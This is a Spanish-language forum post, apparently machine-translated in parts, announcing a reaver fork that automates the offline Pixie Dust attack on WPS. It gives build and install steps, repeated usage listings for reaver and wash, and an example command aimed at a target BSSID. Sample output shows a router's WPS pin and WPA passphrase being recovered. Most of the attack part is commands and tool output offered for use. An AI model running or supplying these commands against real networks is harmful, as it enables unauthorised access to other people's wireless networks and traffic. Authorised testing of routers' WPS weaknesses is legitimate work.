Mostrar Mensajes
DataHead y me hicieron modificaciones en reaver para hacer que el Pixie Dust Attack e probar el número de pin y automatizar todo el trabajo
Aquí está nuestra contribución
GitHub
https://github.com/t6x/reaver-wps-fork-t6x
Overview
reaver-wps-fork-t6x es una modificación hecho desde el tenedor de reaver (ht tps://code.google.com/p/reaver-wps-fork/)
Esta versión modificada utiliza el ataque del Pixie Dust de encontrar el número de PIN correcto de wps offline
El ataque se utiliza en esta versión fue desarrollada por Wiire (ht tps://github.com/wiire/pixiewps)
Install Required Libraries and Tools
Libraries for reaver
Código:
sudo apt-get install libpcap-dev aircrack-ng sqlite3 libsqlite3-dev
Tools
Código:
You must have installed the pixiewps created by Wiire (ht tps://github.com/wiire/pixiewps)
Compile and Install
Código:
Build Reaver
cd reaver-wps-fork-t6x-master
cd src
./configure
make
Install Reaver
sudo make install
cd reaver-wps-fork-t6x-master
cd src
./configure
make
Install Reaver
sudo make install
Usage - Reaver
Código:
Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>
mod by DataHead
Required Arguments:
-i, --interface=<wlan> Name of the monitor-mode interface to use
-b, --bssid=<mac> BSSID of the target AP
Optional Arguments:
-m, --mac=<mac> MAC of the host system
-e, --essid=<ssid> ESSID of the target AP
-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
-o, --out-file=<file> Send output to a log file [stdout]
-s, --session=<file> Restore a previous session file
-C, --exec=<command> Execute the supplied command upon successful pin recovery
-D, --daemonize Daemonize reaver
-a, --auto Auto detect the best advanced options for the target AP
-f, --fixed Disable channel hopping
-5, --5ghz Use 5GHz 802.11 channels
-v, --verbose Display non-critical warnings (-vv for more)
-q, --quiet Only display critical messages
-K, --pixie-dust Test Pixie Dust [1] Basic(-S) [2] With E-Once(-S) [3] With PKR
-Z, --no-auto-pass Not run automatically reaver to get the password when the pixiewps retrieves the pin
-h, --help Show help
Advanced Options:
-p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin
-d, --delay=<seconds> Set the delay between pin attempts [1]
-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
-g, --max-attempts=<num> Quit after num pin attempts
-x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
-t, --timeout=<seconds> Set the receive timeout period [5]
-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
-A, --no-associate Do not associate with the AP (association must be done by another application)
-N, --no-nacks Do not send NACK messages when out of order packets are received
-S, --dh-small Use small DH keys to improve crack speed
-L, --ignore-locks Ignore locked state reported by the target AP
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
-n, --nack Target AP always sends a NACK [Auto]
-w, --win7 Mimic a Windows 7 registrar [False]
-X, --exhaustive Set exhaustive mode from the beginning of the session [False]
-1, --p1-index Set initial array index for the first half of the pin [False]
-2, --p2-index Set initial array index for the second half of the pin [False]
-P, --pixiedust-loop Set Into PixieLoop mode ( doesnt send M4, and loops through to M3 [False]
Example:
reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv -K 1
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>
mod by DataHead
Required Arguments:
-i, --interface=<wlan> Name of the monitor-mode interface to use
-b, --bssid=<mac> BSSID of the target AP
Optional Arguments:
-m, --mac=<mac> MAC of the host system
-e, --essid=<ssid> ESSID of the target AP
-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
-o, --out-file=<file> Send output to a log file [stdout]
-s, --session=<file> Restore a previous session file
-C, --exec=<command> Execute the supplied command upon successful pin recovery
-D, --daemonize Daemonize reaver
-a, --auto Auto detect the best advanced options for the target AP
-f, --fixed Disable channel hopping
-5, --5ghz Use 5GHz 802.11 channels
-v, --verbose Display non-critical warnings (-vv for more)
-q, --quiet Only display critical messages
-K, --pixie-dust Test Pixie Dust [1] Basic(-S) [2] With E-Once(-S) [3] With PKR
-Z, --no-auto-pass Not run automatically reaver to get the password when the pixiewps retrieves the pin
-h, --help Show help
Advanced Options:
-p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin
-d, --delay=<seconds> Set the delay between pin attempts [1]
-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
-g, --max-attempts=<num> Quit after num pin attempts
-x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
-t, --timeout=<seconds> Set the receive timeout period [5]
-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
-A, --no-associate Do not associate with the AP (association must be done by another application)
-N, --no-nacks Do not send NACK messages when out of order packets are received
-S, --dh-small Use small DH keys to improve crack speed
-L, --ignore-locks Ignore locked state reported by the target AP
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
-n, --nack Target AP always sends a NACK [Auto]
-w, --win7 Mimic a Windows 7 registrar [False]
-X, --exhaustive Set exhaustive mode from the beginning of the session [False]
-1, --p1-index Set initial array index for the first half of the pin [False]
-2, --p2-index Set initial array index for the second half of the pin [False]
-P, --pixiedust-loop Set Into PixieLoop mode ( doesnt send M4, and loops through to M3 [False]
Example:
reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv -K 1
Usage - wash
Código:
Wash v1.5.1 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>
mod by DataHead
Required Arguments:
-i, --interface=<iface> Interface to capture packets on
-f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files
Optional Arguments:
-c, --channel=<num> Channel to listen on [auto]
-o, --out-file=<file> Write data to file
-n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
-D, --daemonize Daemonize wash
-C, --ignore-fcs Ignore frame checksum errors
-5, --5ghz Use 5GHz 802.11 channels
-s, --scan Use scan mode
-u, --survey Use survey mode [default]
-P, --file-output-piped Output Piped x|y|z...
-g, --get-chipset Output Piped and tries to read the chipset with reaver
-h, --help Show help
Example:
wash -i mon0
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>
mod by DataHead
Required Arguments:
-i, --interface=<iface> Interface to capture packets on
-f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files
Optional Arguments:
-c, --channel=<num> Channel to listen on [auto]
-o, --out-file=<file> Write data to file
-n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
-D, --daemonize Daemonize wash
-C, --ignore-fcs Ignore frame checksum errors
-5, --5ghz Use 5GHz 802.11 channels
-s, --scan Use scan mode
-u, --survey Use survey mode [default]
-P, --file-output-piped Output Piped x|y|z...
-g, --get-chipset Output Piped and tries to read the chipset with reaver
-h, --help Show help
Example:
wash -i mon0
Example
Código:
Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>
[+] Switching mon0 to channel 1
[?] Restore previous session for A.:9.:D.:....:....:...? [n/Y] n
[+] Waiting for beacon from A.:9.:D.:....:....:...
[+] Associated with A.:9.:D.:....:....:.... (ESSID: ......)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: c6:66:a6:72:37:6d:......
[P] PKE: 10:cf:cc:88:99:4b:15:de:a6:b3:26:fe:93:24:......
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[P] WPS Model Serial Number: A978FD123BC
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:......
[P] AuthKey: bf:68:34:b5:ce:e2:a1:24:dc:15:01:1c:78:9e:74:......
[+] Sending M2 message
[P] E-Hash1: 2e:d5:17:16:36:b8:c2:bb:d1:14:7c:18:cf:89:58:b8:1d:9d:39:......
[P] E-Hash2: 94:fb:41:53:55:b3:8e:1c:fe:2b:a3:9b:b5:82:11:......
[Pixie-Dust]
[Pixie-Dust] [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] [*] PSK1: dd:09:bd:24:......
[Pixie-Dust] [*] PSK2: 77:e0:dd:00:......
[Pixie-Dust] [+] WPS pin: 9178....
[Pixie-Dust]
[Pixie-Dust] [*] Time taken: 0 s
[Pixie-Dust]
Running the reaver with the correct pin wait ...
[Reaver Test] BSSID: A.:9.:D.:3.:..:..
[Reaver Test] Channel: 1
[Reaver Test] [+] WPS PIN: '9178....'
[Reaver Test] [+] WPA PSK: '112233'
[Reaver Test] [+] AP SSID: '....'
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>
[+] Switching mon0 to channel 1
[?] Restore previous session for A.:9.:D.:....:....:...? [n/Y] n
[+] Waiting for beacon from A.:9.:D.:....:....:...
[+] Associated with A.:9.:D.:....:....:.... (ESSID: ......)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: c6:66:a6:72:37:6d:......
[P] PKE: 10:cf:cc:88:99:4b:15:de:a6:b3:26:fe:93:24:......
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[P] WPS Model Serial Number: A978FD123BC
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:......
[P] AuthKey: bf:68:34:b5:ce:e2:a1:24:dc:15:01:1c:78:9e:74:......
[+] Sending M2 message
[P] E-Hash1: 2e:d5:17:16:36:b8:c2:bb:d1:14:7c:18:cf:89:58:b8:1d:9d:39:......
[P] E-Hash2: 94:fb:41:53:55:b3:8e:1c:fe:2b:a3:9b:b5:82:11:......
[Pixie-Dust]
[Pixie-Dust] [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] [*] PSK1: dd:09:bd:24:......
[Pixie-Dust] [*] PSK2: 77:e0:dd:00:......
[Pixie-Dust] [+] WPS pin: 9178....
[Pixie-Dust]
[Pixie-Dust] [*] Time taken: 0 s
[Pixie-Dust]
Running the reaver with the correct pin wait ...
[Reaver Test] BSSID: A.:9.:D.:3.:..:..
[Reaver Test] Channel: 1
[Reaver Test] [+] WPS PIN: '9178....'
[Reaver Test] [+] WPA PSK: '112233'
[Reaver Test] [+] AP SSID: '....'
Código:
# wash -i mon0 -g -c 2
XX:XX:XX:XX:XX:XX| 1|-68|1.0|No |AAA| D-Link| DIR-615
XX:XX:XX:XX:XX:XX| 1|-58|1.0|No |CCC| ASUSTeK Computer Inc.| RT-N56U
XX:XX:XX:XX:XX:XX| 1|-68|1.0|No |AAA| D-Link| DIR-615
XX:XX:XX:XX:XX:XX| 1|-58|1.0|No |CCC| ASUSTeK Computer Inc.| RT-N56U
Cualquier problema o sugerencia por favor póngase en contacto conmigo